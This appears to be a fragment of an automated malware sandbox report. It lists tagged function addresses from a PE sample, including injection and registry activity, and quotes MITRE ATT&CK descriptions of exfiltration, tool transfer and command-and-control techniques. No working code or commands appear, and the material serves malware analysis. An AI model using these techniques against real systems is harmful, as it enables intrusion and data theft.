Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

Function 100098A8, Relevance: 10.6, APIs: 7, Instructions: 70
injectionmemorythreadCOMMON

Function 10005CA4, Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Function 1000D0F4, Relevance: 54.6, APIs: 18, Strings: 13, Instructions: 400
sleepfileCOMMON

Function 1000B78C, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 309
fileCOMMON

Function 100054BC, Relevance: 7.5, APIs: 5, Instructions: 43
fileCOMMON

Function 100054C4, Relevance: 7.5, APIs: 5, Instructions: 40
fileCOMMON

Function 10005EB4, Relevance: 6.0, APIs: 4, Instructions: 48
fileCOMMON

Function 10006090, Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Function 1000577C, Relevance: 4.6, APIs: 3, Instructions: 61
registryCOMMON

Function 10003C28, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Function 10003158, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Function 10003150, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 10003154, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 10009950, Relevance: 3.0, APIs: 2, Instructions: 38
sleepprocessCOMMON

Function 1000A2F4, Relevance: 3.0, APIs: 2, Instructions: 6
COMMON

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre